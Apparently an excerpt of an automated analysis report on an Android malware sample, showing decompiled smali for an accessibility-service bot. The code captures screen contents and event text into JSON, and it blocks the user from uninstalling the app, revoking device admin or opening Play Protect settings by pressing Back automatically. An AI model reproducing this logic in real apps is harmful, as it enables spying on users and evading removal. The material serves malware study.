                        • android.view.accessibility.AccessibilityEvent.getPackageName
                        • org.json.JSONObject.put
                        • java.lang.System.currentTimeMillis
                        • org.json.JSONObject.put
                        • org.json.JSONObject.put
                        • org.json.JSONObject.length
                        • org.json.JSONObject.toString
                        • org.json.JSONObject.put
                        • android.accessibilityservice.AccessibilityService.getRootInActiveWindow
                        • org.json.JSONObject.put
                        • org.json.JSONObject.put
                        • org.json.JSONObject.put
                        • org.json.JSONObject.put
                        Strings
                        • EventType
                        • eventClass
                        • EventTime
                        • eventText
                        • nodeClass
                        • nodeText
                        • contentDescription
                        • ID
                        • isEnabled
                        • isClickable
                        • isCheckable
                        • isChecked
                        • isVisibleToUser
                        • package
                        • time
                        • event
                        • grabBuffer
                        • tree
                        Position Instruction Meta Information
                        0.prologue
                        1new-instance v0, Lorg/json/JSONObject;
                        3invoke-direct {v0}, Lorg/json/JSONObject;-><init>()V
                        4try_start_5: new-instance v1, Lorg/json/JSONObject;
                        6invoke-direct {v1}, Lorg/json/JSONObject;-><init>()V
                        8const-string v2, "EventType"
                        10invoke-virtual {p1}, Landroid/view/accessibility/AccessibilityEvent;->getEventType()I
                        11move-result v3
                        13invoke-static {v3}, Landroid/view/accessibility/AccessibilityEvent;->eventTypeToString(I)Ljava/lang/String;
                        14move-result-object v3
                        16invoke-virtual {v1, v2, v3}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
                        18const-string v2, "eventClass"
                        20invoke-virtual {p1}, Landroid/view/accessibility/AccessibilityEvent;->getClassName()Ljava/lang/CharSequence;
                        21move-result-object v3
                        23invoke-virtual {v1, v2, v3}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
                        25const-string v2, "EventTime"
                        27invoke-virtual {p1}, Landroid/view/accessibility/AccessibilityEvent;->getEventTime()J
                        28move-result-wide v4
                        30invoke-virtual {v1, v2, v4, v5}, Lorg/json/JSONObject;->put(Ljava/lang/String;J)Lorg/json/JSONObject;
                        32invoke-virtual {p1}, Landroid/view/accessibility/AccessibilityEvent;->getText()Ljava/util/List;
                        33move-result-object v2
                        34if-eqz v2, :cond_ed
                        36const-string v2, "eventText"
                        38invoke-virtual {p1}, Landroid/view/accessibility/AccessibilityEvent;->getText()Ljava/util/List;
                        39move-result-object v3
                        41invoke-virtual {v3}, Ljava/lang/Object;->toString()Ljava/lang/String;
                        42move-result-object v3
                        44invoke-virtual {v1, v2, v3}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
                        45goto_3c:
                        46invoke-virtual {p1}, Landroid/view/accessibility/AccessibilityEvent;->getSource()Landroid/view/accessibility/AccessibilityNodeInfo;
                        47move-result-object v2
                        48if-eqz v2, :cond_b0
                        49sget v3, Landroid/os/Build$VERSION;->SDK_INT:I
                        50const/16 v4, 0x17
                        51if-lt v3, v4, :cond_4b
                        53invoke-virtual {v2}, Landroid/view/accessibility/AccessibilityNodeInfo;->refresh()Z
                        54cond_4b:
                        55const-string v3, "nodeClass"
                        57invoke-virtual {v2}, Landroid/view/accessibility/AccessibilityNodeInfo;->getClassName()Ljava/lang/CharSequence;
                        58move-result-object v4
                        60invoke-virtual {v1, v3, v4}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
                        62invoke-virtual {v2}, Landroid/view/accessibility/AccessibilityNodeInfo;->getText()Ljava/lang/CharSequence;
                        63move-result-object v3
                        64if-eqz v3, :cond_f8
                        66const-string v3, "nodeText"
                        68invoke-virtual {v2}, Landroid/view/accessibility/AccessibilityNodeInfo;->getText()Ljava/lang/CharSequence;
                        69move-result-object v4
                        71invoke-interface {v4}, Ljava/lang/CharSequence;->toString()Ljava/lang/String;
                        72move-result-object v4
                        74invoke-virtual {v1, v3, v4}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
                        75goto_67:
                        76invoke-virtual {v2}, Landroid/view/accessibility/AccessibilityNodeInfo;->getContentDescription()Ljava/lang/CharSequence;
                        77move-result-object v3
                        78if-eqz v3, :cond_101
                        80const-string v3, "contentDescription"
                        82invoke-virtual {v2}, Landroid/view/accessibility/AccessibilityNodeInfo;->getContentDescription()Ljava/lang/CharSequence;
                        83move-result-object v4
                        85invoke-interface {v4}, Ljava/lang/CharSequence;->toString()Ljava/lang/String;
                        86move-result-object v4
                        88invoke-virtual {v1, v3, v4}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
                        89goto_7a:
                        90const-string v3, "ID"
                        92invoke-virtual {v2}, Landroid/view/accessibility/AccessibilityNodeInfo;->getViewIdResourceName()Ljava/lang/String;
                        93move-result-object v4
                        95invoke-virtual {v1, v3, v4}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
                        97const-string v3, "isEnabled"
                        99invoke-virtual {v2}, Landroid/view/accessibility/AccessibilityNodeInfo;->isEnabled()Z
                        100move-result v4
                        102invoke-virtual {v1, v3, v4}, Lorg/json/JSONObject;->put(Ljava/lang/String;Z)Lorg/json/JSONObject;
                        104const-string v3, "isClickable"
                        106invoke-virtual {v2}, Landroid/view/accessibility/AccessibilityNodeInfo;->isClickable()Z
                        107move-result v4
                        109invoke-virtual {v1, v3, v4}, Lorg/json/JSONObject;->put(Ljava/lang/String;Z)Lorg/json/JSONObject;
                        111const-string v3, "isCheckable"
                        113invoke-virtual {v2}, Landroid/view/accessibility/AccessibilityNodeInfo;->isCheckable()Z
                        114move-result v4
                        116invoke-virtual {v1, v3, v4}, Lorg/json/JSONObject;->put(Ljava/lang/String;Z)Lorg/json/JSONObject;
                        118const-string v3, "isChecked"
                        120invoke-virtual {v2}, Landroid/view/accessibility/AccessibilityNodeInfo;->isChecked()Z
                        121move-result v4
                        123invoke-virtual {v1, v3, v4}, Lorg/json/JSONObject;->put(Ljava/lang/String;Z)Lorg/json/JSONObject;
                        125const-string v3, "isVisibleToUser"
                        127invoke-virtual {v2}, Landroid/view/accessibility/AccessibilityNodeInfo;->isVisibleToUser()Z
                        128move-result v2
                        130invoke-virtual {v1, v3, v2}, Lorg/json/JSONObject;->put(Ljava/lang/String;Z)Lorg/json/JSONObject;
                        131cond_b0:
                        132const-string v2, "package"
                        134invoke-virtual {p1}, Landroid/view/accessibility/AccessibilityEvent;->getPackageName()Ljava/lang/CharSequence;
                        135move-result-object v3
                        137invoke-virtual {v0, v2, v3}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
                        139const-string v2, "time"
                        141invoke-static {}, Ljava/lang/System;->currentTimeMillis()J
                        142move-result-wide v4
                        143const-wide/16 v6, 0x3e8
                        144div-long/2addr v4, v6
                        146invoke-virtual {v0, v2, v4, v5}, Lorg/json/JSONObject;->put(Ljava/lang/String;J)Lorg/json/JSONObject;
                        148const-string v2, "event"
                        150invoke-virtual {v0, v2, v1}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
                        152sget-object v1, Lcom/lib;->grabBuffer:Lorg/json/JSONObject;
                        154invoke-virtual {v1}, Lorg/json/JSONObject;->length()I
                        155move-result v1
                        156if-lez v1, :cond_dd
                        158const-string v1, "grabBuffer"
                        160sget-object v2, Lcom/lib;->grabBuffer:Lorg/json/JSONObject;
                        162invoke-virtual {v2}, Lorg/json/JSONObject;->toString()Ljava/lang/String;
                        163move-result-object v2
                        165invoke-virtual {v0, v1, v2}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
                        166cond_dd:
                        167const-string v1, "tree"
                        169sget-object v2, Lcom/lib;->a11yService:Landroid/accessibilityservice/AccessibilityService;
                        171invoke-virtual {v2}, Landroid/accessibilityservice/AccessibilityService;->getRootInActiveWindow()Landroid/view/accessibility/AccessibilityNodeInfo;
                        172move-result-object v2
                        174invoke-static {v2}, Lcom/lib;->parseTree(Landroid/view/accessibility/AccessibilityNodeInfo;)Lorg/json/JSONArray;
                        175move-result-object v2
                        177invoke-virtual {v0, v1, v2}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
                        178goto_ec: return-object v0
                        179cond_ed:
                        180const-string v2, "eventText"
                        182const-string v3, ""
                        184invoke-virtual {v1, v2, v3}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
                        185goto/16 :goto_3c
                        186catch_f6: move-exception v1
                        187goto/16 :goto_ec
                        188cond_f8:
                        189const-string v3, "nodeText"
                        191const-string v4, ""
                        193invoke-virtual {v1, v3, v4}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
                        194goto/16 :goto_67
                        195cond_101:
                        196const-string v3, "contentDescription"
                        198const-string v4, ""
                        200invoke-virtual {v1, v3, v4}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
                        201try_end_108: goto/16 :goto_7a
                        Cross References
                        APIs
                        • org.json.JSONObject.isNull
                        • org.json.JSONObject.getString
                        • java.lang.String.equals
                        • android.view.accessibility.AccessibilityEvent.getEventType
                        • android.view.accessibility.AccessibilityEvent.eventTypeToString
                        • java.lang.String.toLowerCase
                        • org.json.JSONObject.getString
                        • java.lang.String.toLowerCase
                        • java.lang.String.equals
                        • org.json.JSONObject.isNull
                        • android.view.accessibility.AccessibilityEvent.getClassName
                        • java.lang.CharSequence.toString
                        • org.json.JSONObject.getString
                        • java.lang.String.matches
                        • org.json.JSONObject.isNull
                        • android.view.accessibility.AccessibilityNodeInfo.getClassName
                        • java.lang.CharSequence.toString
                        • java.lang.String.toLowerCase
                        • org.json.JSONObject.getString
                        • java.lang.String.toLowerCase
                        • java.lang.String.contains
                        • org.json.JSONObject.isNull
                        • android.view.accessibility.AccessibilityEvent.getText
                        • android.view.accessibility.AccessibilityEvent.getText
                        • java.lang.Object.toString
                        • org.json.JSONObject.getString
                        • java.lang.String.matches
                        • org.json.JSONObject.isNull
                        • android.view.accessibility.AccessibilityNodeInfo.getText
                        • android.view.accessibility.AccessibilityNodeInfo.getText
                        • java.lang.CharSequence.toString
                        • java.lang.String.toLowerCase
                        • org.json.JSONObject.getString
                        • java.lang.String.toLowerCase
                        • java.lang.String.contains
                        • org.json.JSONObject.isNull
                        • android.view.accessibility.AccessibilityNodeInfo.isEnabled
                        • org.json.JSONObject.getBoolean
                        • org.json.JSONObject.isNull
                        • android.view.accessibility.AccessibilityNodeInfo.isClickable
                        • org.json.JSONObject.getBoolean
                        Strings
                        • type
                        • *
                        • eventClass
                        • nodeClass
                        • eventText
                        • nodeText
                        • isEnabled
                        • isClickable
                        Position Instruction Meta Information
                        0.prologue
                        1const/4 v0, 0x0
                        2try_start_1:
                        3const-string v1, "type"
                        5invoke-virtual {p3, v1}, Lorg/json/JSONObject;->isNull(Ljava/lang/String;)Z
                        6move-result v1
                        7if-nez v1, :cond_34
                        9const-string v1, "type"
                        11invoke-virtual {p3, v1}, Lorg/json/JSONObject;->getString(Ljava/lang/String;)Ljava/lang/String;
                        12move-result-object v1
                        14const-string v2, "*"
                        16invoke-virtual {v1, v2}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
                        17move-result v1
                        18if-nez v1, :cond_34
                        20invoke-virtual {p1}, Landroid/view/accessibility/AccessibilityEvent;->getEventType()I
                        21move-result v1
                        23invoke-static {v1}, Landroid/view/accessibility/AccessibilityEvent;->eventTypeToString(I)Ljava/lang/String;
                        24move-result-object v1
                        26invoke-virtual {v1}, Ljava/lang/String;->toLowerCase()Ljava/lang/String;
                        27move-result-object v1
                        29const-string v2, "type"
                        31invoke-virtual {p3, v2}, Lorg/json/JSONObject;->getString(Ljava/lang/String;)Ljava/lang/String;
                        32move-result-object v2
                        34invoke-virtual {v2}, Ljava/lang/String;->toLowerCase()Ljava/lang/String;
                        35move-result-object v2
                        37invoke-virtual {v1, v2}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
                        38move-result v1
                        39if-nez v1, :cond_34
                        40goto_33: return v0
                        41cond_34:
                        42const-string v1, "eventClass"
                        44invoke-virtual {p3, v1}, Lorg/json/JSONObject;->isNull(Ljava/lang/String;)Z
                        45move-result v1
                        46if-nez v1, :cond_50
                        48invoke-virtual {p1}, Landroid/view/accessibility/AccessibilityEvent;->getClassName()Ljava/lang/CharSequence;
                        49move-result-object v1
                        51invoke-interface {v1}, Ljava/lang/CharSequence;->toString()Ljava/lang/String;
                        52move-result-object v1
                        54const-string v2, "eventClass"
                        56invoke-virtual {p3, v2}, Lorg/json/JSONObject;->getString(Ljava/lang/String;)Ljava/lang/String;
                        57move-result-object v2
                        59invoke-virtual {v1, v2}, Ljava/lang/String;->matches(Ljava/lang/String;)Z
                        60move-result v1
                        61if-eqz v1, :cond_33
                        62cond_50:
                        63const-string v1, "nodeClass"
                        65invoke-virtual {p3, v1}, Lorg/json/JSONObject;->isNull(Ljava/lang/String;)Z
                        66move-result v1
                        67if-nez v1, :cond_74
                        69invoke-virtual {p2}, Landroid/view/accessibility/AccessibilityNodeInfo;->getClassName()Ljava/lang/CharSequence;
                        70move-result-object v1
                        72invoke-interface {v1}, Ljava/lang/CharSequence;->toString()Ljava/lang/String;
                        73move-result-object v1
                        75invoke-virtual {v1}, Ljava/lang/String;->toLowerCase()Ljava/lang/String;
                        76move-result-object v1
                        78const-string v2, "nodeClass"
                        80invoke-virtual {p3, v2}, Lorg/json/JSONObject;->getString(Ljava/lang/String;)Ljava/lang/String;
                        81move-result-object v2
                        83invoke-virtual {v2}, Ljava/lang/String;->toLowerCase()Ljava/lang/String;
                        84move-result-object v2
                        86invoke-virtual {v1, v2}, Ljava/lang/String;->contains(Ljava/lang/CharSequence;)Z
                        87move-result v1
                        88if-eqz v1, :cond_33
                        89cond_74:
                        90const-string v1, "eventText"
                        92invoke-virtual {p3, v1}, Lorg/json/JSONObject;->isNull(Ljava/lang/String;)Z
                        93move-result v1
                        94if-nez v1, :cond_96
                        96invoke-virtual {p1}, Landroid/view/accessibility/AccessibilityEvent;->getText()Ljava/util/List;
                        97move-result-object v1
                        98if-eqz v1, :cond_96
                        100invoke-virtual {p1}, Landroid/view/accessibility/AccessibilityEvent;->getText()Ljava/util/List;
                        101move-result-object v1
                        103invoke-virtual {v1}, Ljava/lang/Object;->toString()Ljava/lang/String;
                        104move-result-object v1
                        106const-string v2, "eventText"
                        108invoke-virtual {p3, v2}, Lorg/json/JSONObject;->getString(Ljava/lang/String;)Ljava/lang/String;
                        109move-result-object v2
                        111invoke-virtual {v1, v2}, Ljava/lang/String;->matches(Ljava/lang/String;)Z
                        112move-result v1
                        113if-eqz v1, :cond_33
                        114cond_96:
                        115const-string v1, "nodeText"
                        117invoke-virtual {p3, v1}, Lorg/json/JSONObject;->isNull(Ljava/lang/String;)Z
                        118move-result v1
                        119if-nez v1, :cond_c0
                        121invoke-virtual {p2}, Landroid/view/accessibility/AccessibilityNodeInfo;->getText()Ljava/lang/CharSequence;
                        122move-result-object v1
                        123if-eqz v1, :cond_c0
                        125invoke-virtual {p2}, Landroid/view/accessibility/AccessibilityNodeInfo;->getText()Ljava/lang/CharSequence;
                        126move-result-object v1
                        128invoke-interface {v1}, Ljava/lang/CharSequence;->toString()Ljava/lang/String;
                        129move-result-object v1
                        131invoke-virtual {v1}, Ljava/lang/String;->toLowerCase()Ljava/lang/String;
                        132move-result-object v1
                        134const-string v2, "nodeText"
                        136invoke-virtual {p3, v2}, Lorg/json/JSONObject;->getString(Ljava/lang/String;)Ljava/lang/String;
                        137move-result-object v2
                        139invoke-virtual {v2}, Ljava/lang/String;->toLowerCase()Ljava/lang/String;
                        140move-result-object v2
                        142invoke-virtual {v1, v2}, Ljava/lang/String;->contains(Ljava/lang/CharSequence;)Z
                        143move-result v1
                        144if-eqz v1, :cond_33
                        145cond_c0:
                        146const-string v1, "isEnabled"
                        148invoke-virtual {p3, v1}, Lorg/json/JSONObject;->isNull(Ljava/lang/String;)Z
                        149move-result v1
                        150if-nez v1, :cond_d4
                        152invoke-virtual {p2}, Landroid/view/accessibility/AccessibilityNodeInfo;->isEnabled()Z
                        153move-result v1
                        155const-string v2, "isEnabled"
                        157invoke-virtual {p3, v2}, Lorg/json/JSONObject;->getBoolean(Ljava/lang/String;)Z
                        158move-result v2
                        159if-ne v1, v2, :cond_33
                        160cond_d4:
                        161const-string v1, "isClickable"
                        163invoke-virtual {p3, v1}, Lorg/json/JSONObject;->isNull(Ljava/lang/String;)Z
                        164move-result v1
                        165if-nez v1, :cond_e8
                        167invoke-virtual {p2}, Landroid/view/accessibility/AccessibilityNodeInfo;->isClickable()Z
                        168move-result v1
                        170const-string v2, "isClickable"
                        172invoke-virtual {p3, v2}, Lorg/json/JSONObject;->getBoolean(Ljava/lang/String;)Z
                        173try_end_e5: move-result v2
                        174if-ne v1, v2, :cond_33
                        175cond_e8: const/4 v0, 0x1
                        176goto/16 :goto_33
                        177catch_eb: move-exception v1
                        178goto/16 :goto_33
                        Cross References
                        APIs
                        • android.view.accessibility.AccessibilityEvent.getPackageName
                        • android.view.accessibility.AccessibilityEvent.getPackageName
                        • java.lang.CharSequence.toString
                        • java.lang.String.matches
                        • android.view.accessibility.AccessibilityEvent.getClassName
                        • java.lang.CharSequence.toString
                        • java.lang.String.equals
                        • android.view.accessibility.AccessibilityEvent.getEventType
                        • android.view.accessibility.AccessibilityEvent.getEventType
                        • android.view.accessibility.AccessibilityEvent.getText
                        • android.view.accessibility.AccessibilityEvent.getText
                        • java.lang.Object.toString
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.String.matches
                        • android.view.accessibility.AccessibilityEvent.getClassName
                        • java.lang.CharSequence.toString
                        • java.lang.String.equals
                        • android.view.accessibility.AccessibilityEvent.getClassName
                        • java.lang.CharSequence.toString
                        • java.lang.String.equals
                        • android.accessibilityservice.AccessibilityService.getRootInActiveWindow
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • android.view.accessibility.AccessibilityEvent.getPackageName
                        • java.lang.CharSequence.toString
                        • java.lang.String.matches
                        • android.view.accessibility.AccessibilityEvent.getClassName
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • android.view.accessibility.AccessibilityEvent.getClassName
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • android.view.accessibility.AccessibilityEvent.getClassName
                        • java.lang.CharSequence.toString
                        • java.lang.String.equals
                        • android.accessibilityservice.AccessibilityService.getRootInActiveWindow
                        Strings
                        • (com.google.android.packageinstaller|com.android.packageinstaller|com.android.settings)
                        • android.app.AlertDialog
                        • [func] [unDeleteA11y] [Force Stop] makeBack
                        • .*
                        • [func] [unDeleteA11y] [clicked contains bot name] makeBack
                        • [func] [unDeleteA11y] [clicked contains bot name] makeBack < M
                        • com.android.packageinstaller.UninstallerActivity
                        • com.android.settings.DeviceAdminAdd
                        • [func] [unDeleteA11y] makeBack
                        • (com.google.android.gms|com.android.vending)
                        • [func] [unDeleteA11y] [com.google.android.gms] getClassName():
                        • (com.google.android.gms.security.settings.SecuritySettingsActivity|com.google.android.gms.security.settings.VerifyAppsSettingsActivity)
                        • [func] [unDeleteA11y] [GP settings] makeBack
                        • com.android.vending:id/protect_.*
                        • [func] [unDeleteA11y] [GP vendinf] makeBack
                        Position Instruction Meta Information
                        0.prologue
                        1sget-boolean v0, Lcom/lib;->needUnDelete:Z
                        2if-eqz v0, :cond_136
                        4invoke-virtual {p1}, Landroid/view/accessibility/AccessibilityEvent;->getPackageName()Ljava/lang/CharSequence;
                        5move-result-object v0
                        6if-eqz v0, :cond_136
                        8invoke-virtual {p1}, Landroid/view/accessibility/AccessibilityEvent;->getPackageName()Ljava/lang/CharSequence;
                        9move-result-object v0
                        11invoke-interface {v0}, Ljava/lang/CharSequence;->toString()Ljava/lang/String;
                        12move-result-object v0
                        14const-string v1, "(com.google.android.packageinstaller|com.android.packageinstaller|com.android.settings)"
                        16invoke-virtual {v0, v1}, Ljava/lang/String;->matches(Ljava/lang/String;)Z
                        17move-result v0
                        18if-eqz v0, :cond_d8
                        20invoke-virtual {p1}, Landroid/view/accessibility/AccessibilityEvent;->getClassName()Ljava/lang/CharSequence;
                        21move-result-object v0
                        23invoke-interface {v0}, Ljava/lang/CharSequence;->toString()Ljava/lang/String;
                        24move-result-object v0
                        26const-string v1, "android.app.AlertDialog"
                        28invoke-virtual {v0, v1}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
                        29move-result v0
                        30if-eqz v0, :cond_32
                        32const-string v0, "[func] [unDeleteA11y] [Force Stop] makeBack"
                        34invoke-virtual {p0, v0}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        36invoke-direct {p0}, Lcom/lib;->makeBack()Z
                        37cond_32:
                        38invoke-virtual {p1}, Landroid/view/accessibility/AccessibilityEvent;->getEventType()I
                        39move-result v0
                        40const/4 v1, 0x1
                        41if-eq v0, v1, :cond_41
                        43invoke-virtual {p1}, Landroid/view/accessibility/AccessibilityEvent;->getEventType()I
                        44move-result v0
                        45const/16 v1, 0x8
                        46if-ne v0, v1, :cond_89
                        47cond_41:
                        48invoke-virtual {p1}, Landroid/view/accessibility/AccessibilityEvent;->getText()Ljava/util/List;
                        49move-result-object v0
                        50if-eqz v0, :cond_89
                        52invoke-virtual {p0, p1}, Lcom/lib;->parseEvent(Landroid/view/accessibility/AccessibilityEvent;)Lorg/json/JSONObject;
                        54invoke-virtual {p1}, Landroid/view/accessibility/AccessibilityEvent;->getText()Ljava/util/List;
                        55move-result-object v0
                        57invoke-virtual {v0}, Ljava/lang/Object;->toString()Ljava/lang/String;
                        58move-result-object v0
                        59new-instance v1, Ljava/lang/StringBuilder;
                        61invoke-direct {v1}, Ljava/lang/StringBuilder;-><init>()V
                        63const-string v2, ".*"
                        65invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        66move-result-object v1
                        68sget-object v2, Lcom/lib;->selfAppName:Ljava/lang/String;
                        70invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        71move-result-object v1
                        73const-string v2, ".*"
                        75invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        76move-result-object v1
                        78invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        79move-result-object v1
                        81invoke-virtual {v0, v1}, Ljava/lang/String;->matches(Ljava/lang/String;)Z
                        82move-result v0
                        83if-eqz v0, :cond_89
                        85const-string v0, "[func] [unDeleteA11y] [clicked contains bot name] makeBack"
                        87invoke-virtual {p0, v0}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        89invoke-direct {p0}, Lcom/lib;->makeBack()Z
                        90sget v0, Landroid/os/Build$VERSION;->SDK_INT:I
                        91const/16 v1, 0x17
                        92if-ge v0, v1, :cond_89
                        94const-string v0, "[func] [unDeleteA11y] [clicked contains bot name] makeBack < M"
                        96invoke-virtual {p0, v0}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        98invoke-direct {p0}, Lcom/lib;->makeBack()Z
                        99cond_89:
                        100invoke-virtual {p1}, Landroid/view/accessibility/AccessibilityEvent;->getClassName()Ljava/lang/CharSequence;
                        101move-result-object v0
                        103invoke-interface {v0}, Ljava/lang/CharSequence;->toString()Ljava/lang/String;
                        104move-result-object v0
                        106const-string v1, "com.android.packageinstaller.UninstallerActivity"
                        108invoke-virtual {v0, v1}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
                        109move-result v0
                        110if-nez v0, :cond_a9
                        112invoke-virtual {p1}, Landroid/view/accessibility/AccessibilityEvent;->getClassName()Ljava/lang/CharSequence;
                        113move-result-object v0
                        115invoke-interface {v0}, Ljava/lang/CharSequence;->toString()Ljava/lang/String;
                        116move-result-object v0
                        118const-string v1, "com.android.settings.DeviceAdminAdd"
                        120invoke-virtual {v0, v1}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
                        121move-result v0
                        122if-eqz v0, :cond_d8
                        123cond_a9:
                        124sget-object v0, Lcom/lib;->a11yService:Landroid/accessibilityservice/AccessibilityService;
                        126invoke-virtual {v0}, Landroid/accessibilityservice/AccessibilityService;->getRootInActiveWindow()Landroid/view/accessibility/AccessibilityNodeInfo;
                        127move-result-object v0
                        128new-instance v1, Ljava/lang/StringBuilder;
                        130invoke-direct {v1}, Ljava/lang/StringBuilder;-><init>()V
                        132const-string v2, ".*"
                        134invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        135move-result-object v1
                        137sget-object v2, Lcom/lib;->selfAppName:Ljava/lang/String;
                        139invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        140move-result-object v1
                        142const-string v2, ".*"
                        144invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        145move-result-object v1
                        147invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        148move-result-object v1
                        150invoke-direct {p0, v0, v1}, Lcom/lib;->getElementByText(Landroid/view/accessibility/AccessibilityNodeInfo;Ljava/lang/String;)Landroid/view/accessibility/AccessibilityNodeInfo;
                        151move-result-object v0
                        152if-eqz v0, :cond_d8
                        154const-string v0, "[func] [unDeleteA11y] makeBack"
                        156invoke-virtual {p0, v0}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        158invoke-direct {p0}, Lcom/lib;->makeBack()Z
                        159cond_d8:
                        160invoke-virtual {p1}, Landroid/view/accessibility/AccessibilityEvent;->getPackageName()Ljava/lang/CharSequence;
                        161move-result-object v0
                        163invoke-interface {v0}, Ljava/lang/CharSequence;->toString()Ljava/lang/String;
                        164move-result-object v0
                        166const-string v1, "(com.google.android.gms|com.android.vending)"
                        168invoke-virtual {v0, v1}, Ljava/lang/String;->matches(Ljava/lang/String;)Z
                        169move-result v0
                        170if-eqz v0, :cond_136
                        172invoke-virtual {p1}, Landroid/view/accessibility/AccessibilityEvent;->getClassName()Ljava/lang/CharSequence;
                        173move-result-object v0
                        174if-eqz v0, :cond_136
                        175new-instance v0, Ljava/lang/StringBuilder;
                        177invoke-direct {v0}, Ljava/lang/StringBuilder;-><init>()V
                        179const-string v1, "[func] [unDeleteA11y] [com.google.android.gms] getClassName(): "
                        181invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        182move-result-object v0
                        184invoke-virtual {p1}, Landroid/view/accessibility/AccessibilityEvent;->getClassName()Ljava/lang/CharSequence;
                        185move-result-object v1
                        187invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        188move-result-object v0
                        190invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        191move-result-object v0
                        193invoke-virtual {p0, v0}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        195invoke-virtual {p1}, Landroid/view/accessibility/AccessibilityEvent;->getClassName()Ljava/lang/CharSequence;
                        196move-result-object v0
                        198invoke-interface {v0}, Ljava/lang/CharSequence;->toString()Ljava/lang/String;
                        199move-result-object v0
                        201const-string v1, "(com.google.android.gms.security.settings.SecuritySettingsActivity|com.google.android.gms.security.settings.VerifyAppsSettingsActivity)"
                        203invoke-virtual {v0, v1}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
                        204move-result v0
                        205if-eqz v0, :cond_120
                        207const-string v0, "[func] [unDeleteA11y] [GP settings] makeBack"
                        209invoke-virtual {p0, v0}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        211invoke-direct {p0}, Lcom/lib;->makeBack()Z
                        212cond_120:
                        213sget-object v0, Lcom/lib;->a11yService:Landroid/accessibilityservice/AccessibilityService;
                        215invoke-virtual {v0}, Landroid/accessibilityservice/AccessibilityService;->getRootInActiveWindow()Landroid/view/accessibility/AccessibilityNodeInfo;
                        216move-result-object v0
                        218const-string v1, "com.android.vending:id/protect_.*"
                        220invoke-virtual {p0, v0, v1}, Lcom/lib;->getElementByID(Landroid/view/accessibility/AccessibilityNodeInfo;Ljava/lang/String;)Landroid/view/accessibility/AccessibilityNodeInfo;
                        221move-result-object v0
                        222if-eqz v0, :cond_136
                        224const-string v0, "[func] [unDeleteA11y] [GP vendinf] makeBack"
                        226invoke-virtual {p0, v0}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        228invoke-direct {p0}, Lcom/lib;->makeBack()Z
                        229cond_136: const/4 v0, 0x0
                        230return v0
                        APIs
                        • java.lang.Integer.intValue
                        • android.app.Activity.finish
                        • android.app.Activity.finish
                        • android.app.Activity.finish
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • android.app.Activity.finish
                        • android.app.Activity.finish
                        • android.app.Activity.finish
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • android.app.Activity.finish
                        • android.app.Activity.finish
